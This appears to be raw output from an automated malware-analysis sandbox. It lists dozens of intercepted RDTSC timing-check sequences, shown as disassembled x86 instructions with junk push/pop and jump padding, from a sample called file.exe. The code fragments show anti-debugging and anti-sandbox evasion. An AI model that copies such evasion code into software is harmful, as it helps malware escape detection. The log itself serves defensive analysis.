Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83DC2 second address: B83DC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84063 second address: B84067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84067 second address: B8410D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F4DA4C5B328h 0x00000010 nop 0x00000011 jmp 00007F4DA4C5B324h 0x00000016 push 00000004h 0x00000018 jnc 00007F4DA4C5B318h 0x0000001e call 00007F4DA4C5B319h 0x00000023 push edi 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pop edi 0x0000002b push eax 0x0000002c jmp 00007F4DA4C5B329h 0x00000031 mov eax, dword ptr [esp+04h] 0x00000035 jg 00007F4DA4C5B335h 0x0000003b mov eax, dword ptr [eax] 0x0000003d jng 00007F4DA4C5B320h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B843C8 second address: B843DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4DA4C5D84Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85C9E second address: B85CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4DA4C5B316h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007F4DA4C5B316h 0x00000014 jmp 00007F4DA4C5B325h 0x00000019 jmp 00007F4DA4C5B327h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B858AA second address: B858AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B858AE second address: B858C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8776C second address: B87771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 525006E second address: 5250091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 48B434F3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DA4C5B325h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524000E second address: 5240024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240024 second address: 5240028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240028 second address: 524002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524002C second address: 5240032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240032 second address: 5240038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240038 second address: 524003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524003C second address: 524004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, ah 0x0000000e mov ax, bx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52804DE second address: 52804E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52804E2 second address: 52804FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52804FF second address: 5280505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280505 second address: 5280509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280509 second address: 5280518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280518 second address: 528051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528051C second address: 5280522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280522 second address: 5280528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210133 second address: 5210137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210137 second address: 521013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521013B second address: 5210141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210141 second address: 5210147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210147 second address: 521014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521014B second address: 52101C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4DA4C5D84Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4DA4C5D854h 0x00000019 sub esi, 74156C88h 0x0000001f jmp 00007F4DA4C5D84Bh 0x00000024 popfd 0x00000025 jmp 00007F4DA4C5D858h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d jmp 00007F4DA4C5D850h 0x00000032 push dword ptr [ebp+04h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52101C7 second address: 52101CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52101CC second address: 52101D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210276 second address: 521027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230D16 second address: 5230D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushfd 0x0000000d jmp 00007F4DA4C5D852h 0x00000012 sub ax, 01E8h 0x00000017 jmp 00007F4DA4C5D84Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007F4DA4C5D859h 0x00000024 sub ax, 3806h 0x00000029 jmp 00007F4DA4C5D851h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230D86 second address: 5230D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230D99 second address: 5230DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007F4DA4C5D84Bh 0x0000000b adc esi, 5376BBEEh 0x00000011 jmp 00007F4DA4C5D859h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, dx 0x00000022 mov di, 2C5Ah 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230DDA second address: 5230DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52308F0 second address: 52308F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52308F5 second address: 523090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DA4C5B31Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523090D second address: 5230912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230912 second address: 5230922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, C0h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230922 second address: 523093D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230785 second address: 52307BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DA4C5B31Ah 0x00000009 and eax, 7AB54C68h 0x0000000f jmp 00007F4DA4C5B31Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4DA4C5B324h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307BF second address: 52307C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307C5 second address: 52307C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307C9 second address: 52307CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307CD second address: 52307EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, 049D246Ah 0x0000000f jmp 00007F4DA4C5B31Bh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307EF second address: 52307F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52307F4 second address: 5230810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B328h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230810 second address: 5230839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DA4C5D855h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5230839 second address: 523083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523083F second address: 5230843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240343 second address: 52403F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 29C2h 0x00000007 jmp 00007F4DA4C5B323h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 pushfd 0x00000015 jmp 00007F4DA4C5B320h 0x0000001a adc ax, BE88h 0x0000001f jmp 00007F4DA4C5B31Bh 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 jmp 00007F4DA4C5B31Fh 0x0000002d pushfd 0x0000002e jmp 00007F4DA4C5B328h 0x00000033 sbb ecx, 08089418h 0x00000039 jmp 00007F4DA4C5B31Bh 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 jmp 00007F4DA4C5B326h 0x00000046 mov ebp, esp 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F4DA4C5B327h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52403F7 second address: 52403FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52403FD second address: 5240401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240401 second address: 5240405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240405 second address: 524042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4DA4C5B329h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524042B second address: 5240431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528040C second address: 5280412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280412 second address: 5280425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 8271h 0x00000007 mov ebx, eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280425 second address: 5280429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280429 second address: 528043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528043D second address: 528044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528044F second address: 5280453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250453 second address: 5250486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4DA4C5B327h 0x00000008 mov ch, AEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4DA4C5B321h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250486 second address: 52504C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4DA4C5D84Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4DA4C5D857h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240F26 second address: 5240F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4DA4C5B322h 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F4DA4C5B320h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c call 00007F4DA4C5B31Eh 0x00000021 movzx eax, dx 0x00000024 pop ebx 0x00000025 mov al, 01h 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4DA4C5B321h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5240F85 second address: 5240F9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52501EE second address: 52501F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52501F2 second address: 52501F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52501F8 second address: 5250219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 8BD0h 0x00000011 mov bh, 94h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250219 second address: 525021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 525021F second address: 5250223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250223 second address: 525023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DA4C5D84Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 525023D second address: 5250290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4DA4C5B31Ch 0x00000011 add esi, 1995D9A8h 0x00000017 jmp 00007F4DA4C5B31Bh 0x0000001c popfd 0x0000001d mov ch, 28h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4DA4C5B31Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250290 second address: 52502EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DA4C5D851h 0x00000009 sbb ecx, 7EDE7C76h 0x0000000f jmp 00007F4DA4C5D851h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F4DA4C5D850h 0x0000001b jmp 00007F4DA4C5D855h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52502EE second address: 5250301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5250301 second address: 5250307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270788 second address: 527078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 527078C second address: 52707A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52707A8 second address: 52707CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DA4C5B325h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52707CF second address: 5270802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F4DA4C5D859h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270802 second address: 5270847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F4DA4C5B31Bh 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 pushfd 0x00000018 jmp 00007F4DA4C5B320h 0x0000001d add ch, 00000068h 0x00000020 jmp 00007F4DA4C5B31Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, di 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270847 second address: 52708CB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5D857h 0x00000008 sbb cx, 9A5Eh 0x0000000d jmp 00007F4DA4C5D859h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F4DA4C5D850h 0x0000001b adc si, 0E58h 0x00000020 jmp 00007F4DA4C5D84Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F4DA4C5D855h 0x00000031 jmp 00007F4DA4C5D84Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52708CB second address: 5270913 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5B328h 0x00000008 xor si, D318h 0x0000000d jmp 00007F4DA4C5B31Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 call 00007F4DA4C5B328h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270913 second address: 5270926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4DA4C5D84Ah 0x0000000e rdtsc
